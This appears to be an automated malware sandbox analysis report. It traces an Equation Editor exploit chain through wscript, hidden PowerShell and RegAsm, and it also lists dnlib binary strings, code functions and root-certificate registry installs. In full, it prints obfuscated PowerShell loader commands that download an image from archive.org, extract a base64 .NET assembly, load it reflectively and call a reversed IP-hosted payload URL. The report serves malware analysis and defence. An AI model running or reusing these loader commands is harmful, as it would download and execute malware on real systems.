                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdb source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: ~WRF{07782794-9C99-45A3-9EF6-DEC334E5B758}.tmp.0.drInitial sample: OLE indicators vbamacros = False

                Data Obfuscation

                barindex
                Suspicious powershell command line found
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?Dc? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?v? ? ? ? ?Gk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?ZQB3? ? ? ? ?F8? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?F8? ? ? ? ?Mg? ? ? ? ?w? ? ? ? ?DI? ? ? ? ?N? ? ? ? ?? ? ? ? ?w? ? ? ? ?Dk? ? ? ? ?M? ? ? ? ?? ? ? ? ?1? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?LgBq? ? ? ? ?H? ? ? ? ?? ? ? ? ?Zw? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?BO? ? ? ? ?GU? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?E8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBO? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Fc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?LgBE? ? ? ? ?G8? ? ? ? ?dwBu? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?R? ? ? ? ?Bh? ? ? ? ?HQ? ? ? ? ?YQ? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FU? ? ? ? ?cgBs? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?RQBu? ? ? ? ?GM? ? ? ? ?bwBk? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?FU? ? ? ? ?V? ? ? ? ?BG? ? ? ? ?Dg? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?FM? ? ? ? ?V? ? ? ? ?BB? ? ? ? ?FI? ? ? ? ?V? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?D
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.CSEDR/022/322.731.532.581//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?Dc? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?v? ? ? ? ?Gk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?ZQB3? ? ? ? ?F8? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?F8? ? ? ? ?Mg? ? ? ? ?w? ? ? ? ?DI? ? ? ? ?N? ? ? ? ?? ? ? ? ?w? ? ? ? ?Dk? ? ? ? ?M? ? ? ? ?? ? ? ? ?1? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?LgBq? ? ? ? ?H? ? ? ? ?? ? ? ? ?Zw? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?BO? ? ? ? ?GU? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?E8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBO? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Fc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?LgBE? ? ? ? ?G8? ? ? ? ?dwBu? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?R? ? ? ? ?Bh? ? ? ? ?HQ? ? ? ? ?YQ? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FU? ? ? ? ?cgBs? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?RQBu? ? ? ? ?GM? ? ? ? ?bwBk? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?FU? ? ? ? ?V? ? ? ? ?BG? ? ? ? ?Dg? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?FM? ? ? ? ?V? ? ? ? ?BB? ? ? ? ?FI? ? ? ? ?V? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.CSEDR/022/322.731.532.581//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,9_2_0041CBE1
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00608F60 push eax; retf 2_2_00608F61
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0060CB52 push esp; retf 2_2_0060CB55
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0060CB58 push esp; retf 2_2_0060CB59
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005FF762 push 13C981EFh; retf 2_2_005FF767
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005FF893 push ebx; iretd 2_2_005FF896
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0060468A push 2000604Dh; ret 2_2_00604A19
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0060BF99 push eax; retn 0060h2_2_0060C1F9
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00225924 push 3401D860h; iretd 8_2_0022592D
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00222D7D pushad ; ret 8_2_00222D81
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00222DAD pushfd ; ret 8_2_00222D91
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00222DAD push ebx; ret 8_2_00222DEA
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00222D82 pushfd ; ret 8_2_00222D91
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00457186 push ecx; ret 9_2_00457199
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0045E55D push esi; ret 9_2_0045E566
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00457AA8 push eax; ret 9_2_00457AC6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00434EB6 push ecx; ret 9_2_00434EC9

                Persistence and Installation Behavior

                barindex
                Installs new ROOT certificates
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
